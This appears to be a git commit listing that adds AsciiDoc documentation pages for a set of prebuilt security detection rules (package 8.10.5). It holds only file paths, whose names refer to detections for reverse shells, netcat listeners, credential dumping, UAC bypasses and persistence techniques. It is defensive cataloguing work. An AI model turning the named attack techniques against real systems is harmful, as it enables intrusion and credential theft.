docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc create mode 
100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-psexec-network-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc 
create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc create mode 100644 
docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc create mode 100644 